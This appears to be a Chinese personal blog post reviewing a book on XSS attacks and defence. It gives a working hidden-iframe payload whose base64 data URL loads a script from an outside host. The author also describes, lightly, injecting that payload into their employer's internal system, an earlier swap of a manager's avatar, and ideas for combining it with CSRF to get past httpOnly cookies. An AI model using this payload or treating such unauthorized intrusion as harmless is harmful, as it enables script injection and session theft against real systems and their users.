《XSS跨站脚本攻击剖析与防御》

16年刚来上海的时候在咸鱼买的二手书,2020年才拿出来阅读上面已经长了很厚的一层灰了

优:

  • 扫盲+实战的结合
  • 给出了复现过程可以自己尝试
  • 列举常见的手法

劣:

  • 13年第一版,15年第5版。现在都2020年了,很多入侵方法都得到了修正
  • 图+代码占据了太多篇幅,有用的点就那几个

读这本书其实最大的收获是了解1种很有意思的注入方法http response splitting cookie的方式我没复现出来转义失效,301的方截取的方式,发现php5.6版本会直接抛出错误(本地最低版本就只有5.6,不知道更低版本是否有这种问题

还有一种是Data urls xss,比较方便省事

1
<iframe style="width:0px;height:0px" src="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHBzOi8vcGljLnBocHpqai5jb20veHNzLmpzIj48L3NjcmlwdD4="></iframe>

我们公司内部系统有个注入点,用这个方法成功注入。但是不知道是不是上次把领导头像换成吉祥物过后提高了防备,auth信息搞了httpOnly 但是配合CSRF还是无懈可击的(只是想想没时间也不敢去实际操作):tw-1f61b: :tw-1f61b:。

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

请我喝杯咖啡吧~